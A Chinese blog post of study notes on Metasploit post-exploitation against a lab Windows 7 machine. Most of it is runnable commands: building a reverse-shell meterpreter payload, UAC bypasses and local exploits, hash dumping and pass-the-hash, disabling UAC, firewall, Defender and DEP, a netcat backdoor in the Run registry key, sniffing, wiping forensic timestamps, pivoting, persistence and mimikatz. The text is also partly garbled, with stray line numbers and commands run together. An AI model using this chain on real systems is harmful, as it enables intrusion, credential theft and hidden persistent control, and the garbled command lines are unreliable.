msf后渗透部分学习
1.准备工作
已经获得目标系统控制权后扩大战果
- 提权
- 信息收集
- 渗透内网
- 永久后门
基于已有 session 扩大战果
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 10.0.0.128 msf exploit(multi/handler) > exploit -j1
2
3
4
- kali 监听
-msf exploit(multi/handler) > sessions1
2
3
4
- windows 系统执行 payload.exe
- kali 进入 metepreter
Active sessions
Id Name Type Information Connection
1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
msf exploit(multi/handler) > sessions
Active sessions
Id Name Type Information Connection
1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: WIN7-VM\John
1 |
|
meterpreter > getuid
Server username: WIN7-VM\John
meterpreter > load priv
[-] The ‘priv’ extension has already been loaded.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
1 |
|
use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
set FILENAME win_update.exe
set SESSION 1
exploit
1
2
3
4
![img](ai4HMWI.png)
![img](D:\blog\source\_posts\msf后渗透部分学习\MXYqrBh.png)
meterpreter > getsystem
meterpreter > getuid
1 |
|
use exploit/windows/local/bypassuac
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
show targets
exploit
1 |
|
use exploit/windows/local/bypassuac_injection
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
1 |
|
use exploit/windows/local/ms13_053_schlamperei
set SESSION 1
1
2
3
4
5
6
![img](https://i.imgur.com/VkGx24J.png)
- use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_081_track_popup_menu
set SESSION 1
exploit
1 |
|
use exploit/windows/local/ms13_097_ie_registry_symlink
set SESSION 1
set URIPATH /
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
set SRVHOST 10.0.0.128
exploit
1 |
|
use exploit/windows/local/ppr_flatten_rec
set SESSION 1
exploit
1 |
|
use exploit/windows/local/ppr_flatten_rec
set payload windows/vncinject/reverse_tcp
set SESSION 1
set LHOST 10.0.0.128
set ViewOnly false
exploit
1
2
3
4
5
6
![img](https://i.imgur.com/wOXJo7u.png)
- 关闭 UAC 功能
- 获取 hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
1
2
- 尝试利用
use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
1
2
3
4
5
6
![img](https://i.imgur.com/vXDrNNx.png)
报错:Exploit failed [no-access]
- 需要提前关闭 UAC
sessions -i 2
shell
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
shutdown -r -t 0
1 |
|
use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit
1 |
|
netsh advfirewall set allprofiles state on
netsh advfirewall set allprofiles state off
1 |
|
net stop windefend
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
##### bitlocker 加密
- manage-bde -off C:
- manage-bde -status C:
##### 关闭DEP
- bcdedit.exe /set {current} nx AlwaysOff
##### 杀死防病毒软件
- run killav
- run post/windows/manage/killav
##### 开启远程桌面服务
开启服务
run post/windows/manage/enable_rdp
1 |
|
关闭服务
run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
开启服务
run getgui –e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
1 |
|
meterpreter >
upload /usr/share/windows-binaries/nc.exe C:\windows\system32
reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d
‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’
reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
1 |
|
meterpreter >
execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 “test” ENABLE ALL
shutdown -r -f -t 0
nc 10.0.0.132 444
1 |
|
load sniffer
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
在内存中缓冲区块循环存储抓包(50000包),不写硬盘
智能过滤 metepreter 流量,传输全称使用 SSL/TLS 加密
1
2
3
4
5
6
7
8
9
10
11
12
13
14
- 解码
- use auxiliary/sniffer/psnuffle
- set PCAPFILE /root/1.cap
##### 搜索文件
- search -f *.ini
- search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx
##### 破解弱口令
- John the Ripper 破解弱口令
- use post/windows/gather/hashdump # system 权限的 metepreter
- run # 结果保存在 /tmp 目录下
- use auxiliary/analyze/jtr_crack_fast
- runmsfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b “\x00\xff” -e x86/shikata_ga_nai -f exe -o payload.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
##### 擦除痕迹
- 文件系统访问会留下痕迹。电子取证重点关注
- 渗透测试和攻击者往往希望销毁文件系统访问痕迹
- 最好的避免被电子取证发现的方法:不要碰文件系统
- metepreter 的先天优势所在(完全基于内存)
- MAC 时间 (Modified / Accessed / Changed)
- ls -l –time=atime/mtime/ctime 1.txt
- stat 1.txt
- touch -d “2 days ago” 1.txt
- touch -t 1501010101 1.txt
- MACE:MFT entry
- MFT:NTFS 文件系统的主文件分配表 Master File Table
- 通常 1024 字节或2个硬盘扇区,其中存放多项 entry 信息
- 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
- 更多信息可研究文件系统取证分析技术
##### pivoting 跳板 /枢纽/支点
- msfvenom 制作 payload利用 win7 攻击内网 XP(对比 xp 有无外网访问权的情况)1
2
3
4
5
6
7
8
9
10
11
12
13
14
- 获取 system 权限
![img](https://i.imgur.com/PXgwA0S.png)
- 利用已经控制的一台计算机作为入侵内网的跳板
- 在其他内网计算机看来访问全部来自于跳板
- run autoroute -s 1.1.1.0/24 # 不能访问外网的被攻击目标内网网段
- 自动路由现实场景
-
– 扫描内网:use auxiliary/scanner/portscan/tcp利用已经被控计算机,在kali 与攻击目标之间实现端口转发1
2
3
4
- Pivoting 之端口转发 portfwd
-
portfwd add -L LIP -l LPORT -r RIP -p RPORT
portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
portfwd list / delete / flushset RHOST 127.0.0.11
2
- use exploit/windows/smb/ms08_067_netapi
set LHOST 2.1.1.10run metsvc -A # 删除 -r1
2
3
4
5
6
7
8
9
10
11
12
- use exploit/multi/handler
- set exitonsession false
#### 持久后门
- 利用漏洞取得的 metepreter 运行内存中,重启失效
- 重复 exploit 漏洞可能造成服务崩溃
- 持久后门保证漏洞修复后仍可远程控制
- metepreter 后门
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1run persistence -h1
2
- 持久后门
run persistence -X -i 10 -p 4444 -r 10.0.0.128
run persistence -U -i 20 -p 4444 -r 10.0.0.128
run persistence -S -i 20 -p 4444 -r 10.0.0.128getsystem1
2
3
4
##### mimikatz
- hashdump 使用的就是 mimikatz 的部分功能
load mimikatz
wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
mimikatz_command -h
mimikatz_command -f a::
mimikatz_command -f samdump::hashes
mimikatz_command -f handle::list
mimikatz_command -f service::list
mimikatz_command -f crypto::listProviders
mimikatz_command -f winmine::infos # 扫雷游戏
Author: Shu1L
Link: https://shu1l.github.io/2020/04/28/msf-hou-shen-tou-bu-fen-xue-xi/
License: 知识共享署名-非商业性使用 4.0 国际许可协议